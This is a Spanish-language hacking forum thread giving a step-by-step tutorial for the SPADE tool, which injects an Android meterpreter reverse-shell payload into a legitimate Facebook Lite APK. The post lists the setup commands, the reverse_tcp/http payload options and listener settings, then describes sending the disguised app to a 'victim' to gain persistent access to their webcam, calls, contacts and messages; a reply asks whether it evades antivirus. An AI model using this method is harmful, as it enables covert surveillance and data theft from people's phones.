comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Generando Payload APK persistente con Spade

  • 1 Respuestas
  • 2296 Vistas

0 Usuarios y 3 Visitantes están viendo este tema.

Desconectado BrowserNet

  • *
  • Underc0der
  • Mensajes: 88
  • Actividad:
    1.67%
  • Reputación 2
  • El TioCyberPunks esta en el barco
    • Ver Perfil
  • Skype: browsernet
« en: Diciembre 04, 2016, 01:50:53 am »


Saludos nuevamente x10 :v xD, en esta oportunidad les traigo una herramienta salida del horno llamada "SPADE", esta peculiar herramienta esta desarrollada en Python, su objetivo principal es "Compilar" un Payload en apk mediante una conexión "meterpreter" establecida con el Framework "Metasploit".

continuando con el POST, esta herramienta te ahorra el proceso de crear tu payload con extensión .apk en msfvenom o por el mismo metasploit, automatiza todo el proceso, solo debes añadir tu servidor y  tus puertos como normalmente se añaden tanto en un payload como en un Handle.

Descarga:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@kali:~# git clone https://github.com/suraj-root/spade.git
root@kali:~# cd spade

Luego de descargar y entrar a su carpeta, instalaremos las respectivas librerías para que el software cumpla sus funciones correctamente:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@kali:~# apt-get install lib32stdc++6 lib32ncurses5 and lib32z1


Una vez completado la instalación de las librerías, deben descargar un aplicativo "APK", donde insertaremos nuestro payload desconpilando el código y procesando la información de la conexión, que haremos desde ese aplicativo infectado creado en spade que se camuflara con el "apk original" en mi caso escogí "Facebook-lite.apk".



Luego de copiar nuestro "APK" descargado en la carpeta raíz "spade", entraremos en nuestra terminal y añadiremos lo siguiente:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@kali:~/spade# ./spade.py facebook-lite.apk


Como vemos en las 3 primeras lineas, hemos añadido nuestro archivo llamado "Facebook-lite.apk" correctamente, luego nos sale las siguientes 6 opciones:

[1] android/meterpreter/reverse_http
[2] android/meterpreter/reverse_https
[3] android/meterpreter/reverse_tcp
[4] android/shell/reverse_http
[5] android/shell/reverse_https
[6] android/shell/reverse_tcp
 
Son el tipo de conexión que vamos a establecer para conectarnos desde nuestro servidor en mi caso escogí una session meterpreter reverse_http, la cual indico que estoy trabajando con el protocolo http, en la mayoría de conexión se utiliza el reverse_tcp, pero el resultado sera el mismo.

LHOST> 192.168.1.35    >>>>>>> Nuestra IP
LPORT> 8080                 >>>>>>> Nuestro Puerto de escucha

Luego de establecer nuestra configuración del servidor y el puerto de escucha, automáticamente comenzara el proceso de adicionan de permisos en el administrativos.




cuando me refiero a los permisos administrativos, me refiero que tendremos acceso a establecer todo tipo de servicios del dispositivo, entre ellos "Activar la Webcamp", establecer llamadas, extraer números de contactos, de mensajes, y todo lo demás, es mas se puede decir que tendremos mas privilegios que nuestra victima.

Luego que termine todo el proceso de compilamiento, nos aparece el siguiente mensaje:

  • Successfully backdoored and saved as facebook-lite-final.apk


quiere decir que nuestro ejecutable apk, se creo correctamente con el nombre "facebook-lite-final.apk", El archivo se encuentra en la misma carpeta spade, luego de ello la subiremos a cualquier gestor de descargas y le enviaremos a nuestro victima, luego nos aparecerá el siguiente mensaje:

Do you want to setup a listener?[y/n]y
le daremos "Y" para que se inicia metasploit framework con nuestra configuración creada de nuestro payload.



una ves que tengamos nuestro servidor en modo de escucha, solo faltaría que nuestra victima "Ejecute" el archivo y automáticamente tendremos acceso a su dispositivo móvil:



Luego que nuestra victima halla instalado nuestro payload, tendremos acceso a su dispositivo.



hemos comprometido el servidor por medio de un ataque POS-explotacion por medio de un payload infectado, como se los comente ustedes pueden extraer datos de contactos, registro de llamadas, de mensajes de texto, activar la webcamp, y ejercer todas las funciones del dispositivo.

Cabe aclarar que este payload se genera de forma persistente, si deseas eliminarlo no podrás hacerlo, ha menos que rootes tu dispositivo y lo elimines por ese medio.


Saludos!!!!!! 



« Última modificación: Diciembre 06, 2016, 08:16:18 am por ANTRAX »

Desconectado redferne

  • *
  • Underc0der
  • Mensajes: 241
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Diciembre 06, 2016, 02:56:30 am »
Interesante, gracias por la información.
Una pregunta, como está de fud?
Es muy detectado?

 

¿Te gustó el post? COMPARTILO!



HERCULES: Genera un payload y evade los antivirus

Iniciado por afravaz

Respuestas: 2
Vistas: 2439
Último mensaje Septiembre 09, 2016, 04:07:48 pm
por ro0tmag
Metasploit Payload Reverse_TCP [Meterpreter]

Iniciado por Matabarras

Respuestas: 0
Vistas: 2156
Último mensaje Noviembre 24, 2012, 01:15:03 pm
por Matabarras
Incorporación de un payload en un archivo RAR / ZIP/JPG/PNG/etc...

Iniciado por LionSec

Respuestas: 4
Vistas: 1945
Último mensaje Noviembre 23, 2014, 01:31:56 pm
por LionSec
Creando Backdoor Persistente en metasploit

Iniciado por BrowserNet

Respuestas: 9
Vistas: 6200
Último mensaje Octubre 03, 2017, 05:50:15 am
por DinamicoBoys
Payload en APK

Iniciado por afravaz

Respuestas: 2
Vistas: 2325
Último mensaje Octubre 09, 2016, 05:34:41 pm
por ceroMee